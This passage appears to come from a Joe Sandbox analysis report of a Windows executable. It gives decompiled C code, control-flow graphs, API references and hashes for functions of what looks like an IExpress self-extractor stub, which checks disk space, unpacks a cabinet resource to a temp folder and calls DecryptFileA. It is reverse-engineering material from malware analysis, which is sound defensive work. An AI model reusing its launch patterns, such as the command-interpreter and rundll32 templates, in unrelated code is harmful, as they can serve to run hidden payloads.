                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                              • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                              • API String ID: 383838535-2280873615
                              • Opcode ID: 3b80c06f1d5a363de6466a93875ad2c26c30bfa232a30638bc829bbbbcca35f7
                              • Instruction ID: 654b32289aa80ccd444a7e66062c3992cce5bb03941d03d4b986cd8a240a810c
                              • Opcode Fuzzy Hash: 3b80c06f1d5a363de6466a93875ad2c26c30bfa232a30638bc829bbbbcca35f7
                              • Instruction Fuzzy Hash: F1A16A70A042085FEF60AB2ACC4CBEA77E9EB95710F1442D9E5D5A72C0DBB18E85CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 324 10e597d-10e59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10e59dd-10e5a1b GetDiskFreeSpaceA 324->325 326 10e59bb-10e59d8 call 10e44b9 call 10e6285 324->326 328 10e5ba1-10e5bde memset call 10e6285 GetLastError FormatMessageA 325->328 329 10e5a21-10e5a4a MulDiv 325->329 341 10e5c05-10e5c14 call 10e6ce0 326->341 338 10e5be3-10e5bfc call 10e44b9 SetCurrentDirectoryA 328->338 329->328 332 10e5a50-10e5a6c GetVolumeInformationA 329->332 335 10e5a6e-10e5ab0 memset call 10e6285 GetLastError FormatMessageA 332->335 336 10e5ab5-10e5aca SetCurrentDirectoryA 332->336 335->338 340 10e5acc-10e5ad1 336->340 353 10e5c02 338->353 344 10e5ae2-10e5ae4 340->344 345 10e5ad3-10e5ad8 340->345 348 10e5ae6 344->348 349 10e5ae7-10e5af8 344->349 345->344 346 10e5ada-10e5ae0 345->346 346->340 346->344 348->349 352 10e5af9-10e5afb 349->352 354 10e5afd-10e5b03 352->354 355 10e5b05-10e5b08 352->355 356 10e5c04 353->356 354->352 354->355 357 10e5b0a-10e5b1b call 10e44b9 355->357 358 10e5b20-10e5b27 355->358 356->341 357->353 360 10e5b29-10e5b33 358->360 361 10e5b52-10e5b5b 358->361 360->361 363 10e5b35-10e5b50 360->363 364 10e5b62-10e5b6d 361->364 363->364 365 10e5b6f-10e5b74 364->365 366 10e5b76-10e5b7d 364->366 367 10e5b85 365->367 368 10e5b7f-10e5b81 366->368 369 10e5b83 366->369 370 10e5b96-10e5b9f 367->370 371 10e5b87-10e5b94 call 10e268b 367->371 368->367 369->367 370->356 371->356
                              C-Code - Quality: 96%
                              			E010E597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                              				signed int _v8;
                              				char _v16;
                              				char _v276;
                              				char _v788;
                              				long _v792;
                              				long _v796;
                              				long _v800;
                              				signed int _v804;
                              				long _v808;
                              				int _v812;
                              				long _v816;
                              				long _v820;
                              				void* __ebx;
                              				void* __esi;
                              				signed int _t46;
                              				int _t50;
                              				signed int _t55;
                              				void* _t66;
                              				int _t69;
                              				signed int _t73;
                              				signed short _t78;
                              				signed int _t87;
                              				signed int _t101;
                              				int _t102;
                              				unsigned int _t103;
                              				unsigned int _t105;
                              				signed int _t111;
                              				long _t112;
                              				signed int _t116;
                              				CHAR* _t118;
                              				signed int _t119;
                              				signed int _t120;
                              
                              				_t114 = __edi;
                              				_t46 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t46 ^ _t120;
                              				_v804 = __edx;
                              				_t118 = __ecx;
                              				GetCurrentDirectoryA(0x104,  &_v276);
                              				_t50 = SetCurrentDirectoryA(_t118); // executed
                              				if(_t50 != 0) {
                              					_push(__edi);
                              					_v796 = 0;
                              					_v792 = 0;
                              					_v800 = 0;
                              					_v808 = 0;
                              					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                              					__eflags = _t55;
                              					if(_t55 == 0) {
                              						L29:
                              						memset( &_v788, 0, 0x200);
                              						 *0x10e9124 = E010E6285();
                              						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                              						_t110 = 0x4b0;
                              						L30:
                              						__eflags = 0;
                              						E010E44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                              						SetCurrentDirectoryA( &_v276);
                              						L31:
                              						_t66 = 0;
                              						__eflags = 0;
                              						L32:
                              						_pop(_t114);
                              						goto L33;
                              					}
                              					_t69 = _v792 * _v796;
                              					_v812 = _t69;
                              					_t116 = MulDiv(_t69, _v800, 0x400);
                              					__eflags = _t116;
                              					if(_t116 == 0) {
                              						goto L29;
                              					}
                              					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                              					__eflags = _t73;
                              					if(_t73 != 0) {
                              						SetCurrentDirectoryA( &_v276); // executed
                              						_t101 =  &_v16;
                              						_t111 = 6;
                              						_t119 = _t118 - _t101;
                              						__eflags = _t119;
                              						while(1) {
                              							_t22 = _t111 - 4; // 0x2
                              							__eflags = _t22;
                              							if(_t22 == 0) {
                              								break;
                              							}
                              							_t87 =  *((intOrPtr*)(_t119 + _t101));
                              							__eflags = _t87;
                              							if(_t87 == 0) {
                              								break;
                              							}
                              							 *_t101 = _t87;
                              							_t101 = _t101 + 1;
                              							_t111 = _t111 - 1;
                              							__eflags = _t111;
                              							if(_t111 != 0) {
                              								continue;
                              							}
                              							break;
                              						}
                              						__eflags = _t111;
                              						if(_t111 == 0) {
                              							_t101 = _t101 - 1;
                              							__eflags = _t101;
                              						}
                              						 *_t101 = 0;
                              						_t112 = 0x200;
                              						_t102 = _v812;
                              						_t78 = 0;
                              						_t118 = 8;
                              						while(1) {
                              							__eflags = _t102 - _t112;
                              							if(_t102 == _t112) {
                              								break;
                              							}
                              							_t112 = _t112 + _t112;
                              							_t78 = _t78 + 1;
                              							__eflags = _t78 - _t118;
                              							if(_t78 < _t118) {
                              								continue;
                              							}
                              							break;
                              						}
                              						__eflags = _t78 - _t118;
                              						if(_t78 != _t118) {
                              							__eflags =  *0x10e9a34 & 0x00000008;
                              							if(( *0x10e9a34 & 0x00000008) == 0) {
                              								L20:
                              								_t103 =  *0x10e9a38; // 0x0
                              								_t110 =  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4));
                              								L21:
                              								__eflags = (_v804 & 0x00000003) - 3;
                              								if((_v804 & 0x00000003) != 3) {
                              									__eflags = _v804 & 0x00000001;
                              									if((_v804 & 0x00000001) == 0) {
                              										__eflags = _t103 - _t116;
                              									} else {
                              										__eflags = _t110 - _t116;
                              									}
                              								} else {
                              									__eflags = _t103 + _t110 - _t116;
                              								}
                              								if(__eflags <= 0) {
                              									 *0x10e9124 = 0;
                              									_t66 = 1;
                              								} else {
                              									_t66 = E010E268B(_a4, _t110, _t103,  &_v16);
                              								}
                              								goto L32;
                              							}
                              							__eflags = _v816 & 0x00008000;
                              							if((_v816 & 0x00008000) == 0) {
                              								goto L20;
                              							}
                              							_t105 =  *0x10e9a38; // 0x0
                              							_t110 =  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4));
                              							_t103 = (_t105 >> 2) +  *0x10e9a38;
                              							goto L21;
                              						}
                              						_t110 = 0x4c5;
                              						E010E44B9(0, 0x4c5, 0, 0, 0x10, 0);
                              						goto L31;
                              					}
                              					memset( &_v788, 0, 0x200);
                              					 *0x10e9124 = E010E6285();
                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                              					_t110 = 0x4f9;
                              					goto L30;
                              				} else {
                              					_t110 = 0x4bc;
                              					E010E44B9(0, 0x4bc, 0, 0, 0x10, 0);
                              					 *0x10e9124 = E010E6285();
                              					_t66 = 0;
                              					L33:
                              					return E010E6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                              				}
                              			}



































                              0x010e597d
                              0x010e5988
                              0x010e598f
                              0x010e599a
                              0x010e59a6
                              0x010e59a8
                              0x010e59af
                              0x010e59b9
                              0x010e59dd
                              0x010e59e4
                              0x010e59f1
                              0x010e59fe
                              0x010e5a0b
                              0x010e5a13
                              0x010e5a19
                              0x010e5a1b
                              0x010e5ba1
                              0x010e5baf
                              0x010e5bbd
                              0x010e5bd8
                              0x010e5bde
                              0x010e5be3
                              0x010e5bec
                              0x010e5bf0
                              0x010e5bfc
                              0x010e5c02
                              0x010e5c02
                              0x010e5c02
                              0x010e5c04
                              0x010e5c04
                              0x00000000
                              0x010e5c04
                              0x010e5a27
                              0x010e5a3a
                              0x010e5a46
                              0x010e5a48
                              0x010e5a4a
                              0x00000000
                              0x00000000
                              0x010e5a64
                              0x010e5a6a
                              0x010e5a6c
                              0x010e5abc
                              0x010e5ac2
                              0x010e5ac9
                              0x010e5aca
                              0x010e5aca
                              0x010e5acc
                              0x010e5acc
                              0x010e5acf
                              0x010e5ad1
                              0x00000000
                              0x00000000
                              0x010e5ad3
                              0x010e5ad6
                              0x010e5ad8
                              0x00000000
                              0x00000000
                              0x010e5ada
                              0x010e5adc
                              0x010e5add
                              0x010e5add
                              0x010e5ae0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e5ae0
                              0x010e5ae2
                              0x010e5ae4
                              0x010e5ae6
                              0x010e5ae6
                              0x010e5ae6
                              0x010e5ae9
                              0x010e5aeb
                              0x010e5af0
                              0x010e5af6
                              0x010e5af8
                              0x010e5af9
                              0x010e5af9
                              0x010e5afb
                              0x00000000
                              0x00000000
                              0x010e5afd
                              0x010e5aff
                              0x010e5b00
                              0x010e5b03
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e5b03
                              0x010e5b05
                              0x010e5b08
                              0x010e5b20
                              0x010e5b27
                              0x010e5b52
                              0x010e5b52
                              0x010e5b5b
                              0x010e5b62
                              0x010e5b6b
                              0x010e5b6d
                              0x010e5b76
                              0x010e5b7d
                              0x010e5b83
                              0x010e5b7f
                              0x010e5b7f
                              0x010e5b7f
                              0x010e5b6f
                              0x010e5b72
                              0x010e5b72
                              0x010e5b85
                              0x010e5b98
                              0x010e5b9e
                              0x010e5b87
                              0x010e5b8f
                              0x010e5b8f
                              0x00000000
                              0x010e5b85
                              0x010e5b29
                              0x010e5b33
                              0x00000000
                              0x00000000
                              0x010e5b35
                              0x010e5b48
                              0x010e5b4a
                              0x00000000
                              0x010e5b4a
                              0x010e5b0f
                              0x010e5b16
                              0x00000000
                              0x010e5b16
                              0x010e5a7c
                              0x010e5a8a
                              0x010e5aa5
                              0x010e5aab
                              0x00000000
                              0x010e59bb
                              0x010e59c0
                              0x010e59c7
                              0x010e59d1
                              0x010e59d6
                              0x010e5c05
                              0x010e5c14
                              0x010e5c14

                              APIs
                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010E59A8
                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 010E59AF
                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010E5A13
                              • MulDiv.KERNEL32(?,?,00000400), ref: 010E5A40
                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010E5A64
                              • memset.MSVCRT ref: 010E5A7C
                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010E5A98
                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010E5AA5
                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010E5BFC
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                              • String ID:
                              • API String ID: 4237285672-0
                              • Opcode ID: 54978a5681cc419ada37a4211a6070477243edd0bccdbf3f72e4aae2af9047f7
                              • Instruction ID: 3da3caed5f4dc38d7667c7415ca2ac04e95bcd7a75a8e9d7d9878658bc68f61b
                              • Opcode Fuzzy Hash: 54978a5681cc419ada37a4211a6070477243edd0bccdbf3f72e4aae2af9047f7
                              • Instruction Fuzzy Hash: 3071B5B5A0020C9FEB65DB66CC88BFB77EDEB48748F0444A9F585D7144DA358E848F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 374 10e4fe0-10e501a call 10e468f FindResourceA LoadResource LockResource 377 10e5020-10e5027 374->377 378 10e5161-10e5163 374->378 379 10e5029-10e5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 10e5057-10e505e call 10e4efd 377->380 379->380 383 10e507c-10e50b4 380->383 384 10e5060-10e5077 call 10e44b9 380->384 389 10e50e8-10e5104 call 10e44b9 383->389 390 10e50b6-10e50da 383->390 388 10e5107-10e510e 384->388 392 10e511d-10e511f 388->392 393 10e5110-10e5117 FreeResource 388->393 398 10e5106 389->398 390->398 402 10e50dc 390->402 395 10e513a-10e5141 392->395 396 10e5121-10e5127 392->396 393->392 400 10e515f 395->400 401 10e5143-10e514a 395->401 396->395 399 10e5129-10e5135 call 10e44b9 396->399 398->388 399->395 400->378 401->400 404 10e514c-10e5159 SendMessageA 401->404 405 10e50e3-10e50e6 402->405 404->400 405->389 405->398
                              C-Code - Quality: 77%
                              			E010E4FE0(void* __edi, void* __eflags) {
                              				void* __ebx;
                              				void* _t8;
                              				struct HWND__* _t9;
                              				int _t10;
                              				void* _t12;
                              				struct HWND__* _t24;
                              				struct HWND__* _t27;
                              				intOrPtr _t29;
                              				void* _t33;
                              				int _t34;
                              				CHAR* _t36;
                              				int _t37;
                              				intOrPtr _t47;
                              
                              				_t33 = __edi;
                              				_t36 = "CABINET";
                              				 *0x10e9144 = E010E468F(_t36, 0, 0);
                              				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                              				 *0x10e9140 = _t8;
                              				if(_t8 == 0) {
                              					return _t8;
                              				}
                              				_t9 =  *0x10e8584; // 0x0
                              				if(_t9 != 0) {
                              					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                              					ShowWindow(GetDlgItem( *0x10e8584, 0x841), 5);
                              				}
                              				_t10 = E010E4EFD(0, 0);
                              				if(_t10 != 0) {
                              					__imp__#20(E010E4CA0, E010E4CC0, E010E4980, E010E4A50, E010E4AD0, E010E4B60, E010E4BC0, 1, 0x10e9148, _t33);
                              					_t34 = _t10;
                              					if(_t34 == 0) {
                              						L8:
                              						_t29 =  *0x10e9148; // 0x0
                              						_t24 =  *0x10e8584; // 0x0
                              						E010E44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                              						_t37 = 0;
                              						L9:
                              						goto L10;
                              					}
                              					__imp__#22(_t34, "*MEMCAB", 0x10e1140, 0, E010E4CD0, 0, 0x10e9140); // executed
                              					_t37 = _t10;
                              					if(_t37 == 0) {
                              						goto L9;
                              					}
                              					__imp__#23(_t34); // executed
                              					if(_t10 != 0) {
                              						goto L9;
                              					}
                              					goto L8;
                              				} else {
                              					_t27 =  *0x10e8584; // 0x0
                              					E010E44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                              					_t37 = 0;
                              					L10:
                              					_t12 =  *0x10e9140; // 0x0
                              					if(_t12 != 0) {
                              						FreeResource(_t12);
                              						 *0x10e9140 = 0;
                              					}
                              					if(_t37 == 0) {
                              						_t47 =  *0x10e91d8; // 0x0
                              						if(_t47 == 0) {
                              							E010E44B9(0, 0x4f8, 0, 0, 0x10, 0);
                              						}
                              					}
                              					if(( *0x10e8a38 & 0x00000001) == 0 && ( *0x10e9a34 & 0x00000001) == 0) {
                              						SendMessageA( *0x10e8584, 0xfa1, _t37, 0);
                              					}
                              					return _t37;
                              				}
                              			}
















                              0x010e4fe0
                              0x010e4fe6
                              0x010e4ff9
                              0x010e500d
                              0x010e5013
                              0x010e501a
                              0x010e5163
                              0x010e5163
                              0x010e5020
                              0x010e5027
                              0x010e5037
                              0x010e5051
                              0x010e5051
                              0x010e5057
                              0x010e505e
                              0x010e50a7
                              0x010e50ad
                              0x010e50b4
                              0x010e50e8
                              0x010e50e8
                              0x010e50ee
                              0x010e50ff
                              0x010e5104
                              0x010e5106
                              0x00000000
                              0x010e5106
                              0x010e50cd
                              0x010e50d3
                              0x010e50da
                              0x00000000
                              0x00000000
                              0x010e50dd
                              0x010e50e6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e5060
                              0x010e5060
                              0x010e5070
                              0x010e5075
                              0x010e5107
                              0x010e5107
                              0x010e510e
                              0x010e5111
                              0x010e5117
                              0x010e5117
                              0x010e511f
                              0x010e5121
                              0x010e5127
                              0x010e5135
                              0x010e5135
                              0x010e5127
                              0x010e5141
                              0x010e5159
                              0x010e5159
                              0x00000000
                              0x010e515f

                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010E4FFE
                              • LoadResource.KERNEL32(00000000,00000000), ref: 010E5006
                              • LockResource.KERNEL32(00000000), ref: 010E500D
                              • GetDlgItem.USER32(00000000,00000842), ref: 010E5030
                              • ShowWindow.USER32(00000000), ref: 010E5037
                              • GetDlgItem.USER32(00000841,00000005), ref: 010E504A
                              • ShowWindow.USER32(00000000), ref: 010E5051
                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 010E5111
                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010E5159
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                              • String ID: *MEMCAB$CABINET
                              • API String ID: 1305606123-2642027498
                              • Opcode ID: a2d4346a6d91ca0371768221d2c1031d5c1bd9bafa0f57097448dc0cf3f1a3b7
                              • Instruction ID: b10cefb49644ed1464e62d32c7085b0d69ad4a2bf1db456079051dc8e20a4939
                              • Opcode Fuzzy Hash: a2d4346a6d91ca0371768221d2c1031d5c1bd9bafa0f57097448dc0cf3f1a3b7
                              • Instruction Fuzzy Hash: 3031E6B5740301AFE7305A67AD8DF663ADCA708F59F0444ADB9C1EE149DA7ECC008760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 406 10e2f1d-10e2f3d 407 10e2f3f-10e2f46 406->407 408 10e2f6c-10e2f73 call 10e5164 406->408 410 10e2f5f-10e2f66 call 10e3a3f 407->410 411 10e2f48 call 10e51e5 407->411 416 10e2f79-10e2f80 call 10e55a0 408->416 417 10e3041 408->417 410->408 410->417 418 10e2f4d-10e2f4f 411->418 416->417 424 10e2f86-10e2fbe GetSystemDirectoryA call 10e658a LoadLibraryA 416->424 420 10e3043-10e3053 call 10e6ce0 417->420 418->417 421 10e2f55-10e2f5d 418->421 421->408 421->410 428 10e2ff7-10e3004 FreeLibrary 424->428 429 10e2fc0-10e2fd4 GetProcAddress 424->429 430 10e3006-10e300c 428->430 431 10e3017-10e3024 SetCurrentDirectoryA 428->431 429->428 432 10e2fd6-10e2fee DecryptFileA 429->432 430->431 433 10e300e call 10e621e 430->433 434 10e3026-10e303c call 10e44b9 call 10e6285 431->434 435 10e3054-10e305a 431->435 432->428 441 10e2ff0-10e2ff5 432->441 445 10e3013-10e3015 433->445 434->417 436 10e305c call 10e3b26 435->436 437 10e3065-10e306c 435->437 447 10e3061-10e3063 436->447 443 10e306e-10e3075 call 10e256d 437->443 444 10e307c-10e3089 437->444 441->428 452 10e307a 443->452 449 10e308b-10e3091 444->449 450 10e30a1-10e30a9 444->450 445->417 445->431 447->417 447->437 449->450 453 10e3093 call 10e3ba2 449->453 455 10e30ab-10e30ad 450->455 456 10e30b4-10e30b7 450->456 452->444 460 10e3098-10e309a 453->460 455->456 457 10e30af call 10e4169 455->457 456->420 457->456 460->417 461 10e309c 460->461 461->450
                              C-Code - Quality: 82%
                              			E010E2F1D(void* __ecx, int __edx) {
                              				signed int _v8;
                              				char _v272;
                              				_Unknown_base(*)()* _v276;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t9;
                              				void* _t11;
                              				struct HWND__* _t12;
                              				void* _t14;
                              				int _t21;
                              				signed int _t22;
                              				signed int _t25;
                              				intOrPtr* _t26;
                              				signed int _t27;
                              				void* _t30;
                              				_Unknown_base(*)()* _t31;
                              				void* _t34;
                              				struct HINSTANCE__* _t36;
                              				intOrPtr _t41;
                              				intOrPtr* _t44;
                              				signed int _t46;
                              				int _t47;
                              				void* _t58;
                              				void* _t59;
                              
                              				_t43 = __edx;
                              				_t9 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t9 ^ _t46;
                              				if( *0x10e8a38 != 0) {
                              					L5:
                              					_t11 = E010E5164(_t52);
                              					_t53 = _t11;
                              					if(_t11 == 0) {
                              						L16:
                              						_t12 = 0;
                              						L17:
                              						return E010E6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                              					}
                              					_t14 = E010E55A0(_t53); // executed
                              					if(_t14 == 0) {
                              						goto L16;
                              					} else {
                              						_t45 = 0x105;
                              						GetSystemDirectoryA( &_v272, 0x105);
                              						_t43 = 0x105;
                              						_t40 =  &_v272;
                              						E010E658A( &_v272, 0x105, "advapi32.dll");
                              						_t36 = LoadLibraryA( &_v272);
                              						_t44 = 0;
                              						if(_t36 != 0) {
                              							_t31 = GetProcAddress(_t36, "DecryptFileA");
                              							_v276 = _t31;
                              							if(_t31 != 0) {
                              								_t45 = _t47;
                              								_t40 = _t31;
                              								 *0x10ea288("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                              								_v276();
                              								if(_t47 != _t47) {
                              									_t40 = 4;
                              									asm("int 0x29");
                              								}
                              							}
                              						}
                              						FreeLibrary(_t36);
                              						_t58 =  *0x10e8a24 - _t44; // 0x0
                              						if(_t58 != 0) {
                              							L14:
                              							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\"); // executed
                              							if(_t21 != 0) {
                              								__eflags =  *0x10e8a2c - _t44; // 0x0
                              								if(__eflags != 0) {
                              									L20:
                              									__eflags =  *0x10e8d48 & 0x000000c0;
                              									if(( *0x10e8d48 & 0x000000c0) == 0) {
                              										_t41 =  *0x10e9a40; // 0x3, executed
                              										_t26 = E010E256D(_t41); // executed
                              										_t44 = _t26;
                              									}
                              									_t22 =  *0x10e8a24; // 0x0
                              									 *0x10e9a44 = _t44;
                              									__eflags = _t22;
                              									if(_t22 != 0) {
                              										L26:
                              										__eflags =  *0x10e8a38;
                              										if( *0x10e8a38 == 0) {
                              											__eflags = _t22;
                              											if(__eflags == 0) {
                              												E010E4169(__eflags);
                              											}
                              										}
                              										_t12 = 1;
                              										goto L17;
                              									} else {
                              										__eflags =  *0x10e9a30 - _t22; // 0x0
                              										if(__eflags != 0) {
                              											goto L26;
                              										}
                              										_t25 = E010E3BA2(); // executed
                              										__eflags = _t25;
                              										if(_t25 == 0) {
                              											goto L16;
                              										}
                              										_t22 =  *0x10e8a24; // 0x0
                              										goto L26;
                              									}
                              								}
                              								_t27 = E010E3B26(_t40, _t44);
                              								__eflags = _t27;
                              								if(_t27 == 0) {
                              									goto L16;
                              								}
                              								goto L20;
                              							}
                              							_t43 = 0x4bc;
                              							E010E44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                              							 *0x10e9124 = E010E6285();
                              							goto L16;
                              						}
                              						_t59 =  *0x10e9a30 - _t44; // 0x0
                              						if(_t59 != 0) {
                              							goto L14;
                              						}
                              						_t30 = E010E621E(); // executed
                              						if(_t30 == 0) {
                              							goto L16;
                              						}
                              						goto L14;
                              					}
                              				}
                              				_t49 =  *0x10e8a24;
                              				if( *0x10e8a24 != 0) {
                              					L4:
                              					_t34 = E010E3A3F(_t51);
                              					_t52 = _t34;
                              					if(_t34 == 0) {
                              						goto L16;
                              					}
                              					goto L5;
                              				}
                              				if(E010E51E5(_t49) == 0) {
                              					goto L16;
                              				}
                              				_t51 =  *0x10e8a38;
                              				if( *0x10e8a38 != 0) {
                              					goto L5;
                              				}
                              				goto L4;
                              			}




























                              0x010e2f1d
                              0x010e2f28
                              0x010e2f2f
                              0x010e2f3d
                              0x010e2f6c
                              0x010e2f6c
                              0x010e2f71
                              0x010e2f73
                              0x010e3041
                              0x010e3041
                              0x010e3043
                              0x010e3053
                              0x010e3053
                              0x010e2f79
                              0x010e2f80
                              0x00000000
                              0x010e2f86
                              0x010e2f86
                              0x010e2f93
                              0x010e2f9e
                              0x010e2fa0
                              0x010e2fa6
                              0x010e2fb8
                              0x010e2fba
                              0x010e2fbe
                              0x010e2fc6
                              0x010e2fcc
                              0x010e2fd4
                              0x010e2fd6
                              0x010e2fd8
                              0x010e2fe0
                              0x010e2fe6
                              0x010e2fee
                              0x010e2ff0
                              0x010e2ff5
                              0x010e2ff5
                              0x010e2fee
                              0x010e2fd4
                              0x010e2ff8
                              0x010e2ffe
                              0x010e3004
                              0x010e3017
                              0x010e301c
                              0x010e3024
                              0x010e3054
                              0x010e305a
                              0x010e3065
                              0x010e3065
                              0x010e306c
                              0x010e306e
                              0x010e3075
                              0x010e307a
                              0x010e307a
                              0x010e307c
                              0x010e3081
                              0x010e3087
                              0x010e3089
                              0x010e30a1
                              0x010e30a1
                              0x010e30a9
                              0x010e30ab
                              0x010e30ad
                              0x010e30af
                              0x010e30af
                              0x010e30ad
                              0x010e30b6
                              0x00000000
                              0x010e308b
                              0x010e308b
                              0x010e3091
                              0x00000000
                              0x00000000
                              0x010e3093
                              0x010e3098
                              0x010e309a
                              0x00000000
                              0x00000000
                              0x010e309c
                              0x00000000
                              0x010e309c
                              0x010e3089
                              0x010e305c
                              0x010e3061
                              0x010e3063
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e3063
                              0x010e302b
                              0x010e3032
                              0x010e303c
                              0x00000000
                              0x010e303c
                              0x010e3006
                              0x010e300c
                              0x00000000
                              0x00000000
                              0x010e300e
                              0x010e3015
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e3015
                              0x010e2f80
                              0x010e2f3f
                              0x010e2f46
                              0x010e2f5f
                              0x010e2f5f
                              0x010e2f64
                              0x010e2f66
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e2f66
                              0x010e2f4f
                              0x00000000
                              0x00000000
                              0x010e2f55
                              0x010e2f5d
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • GetSystemDirectoryA.KERNEL32 ref: 010E2F93
                              • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010E2FB2
                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010E2FC6
                              • DecryptFileA.ADVAPI32 ref: 010E2FE6
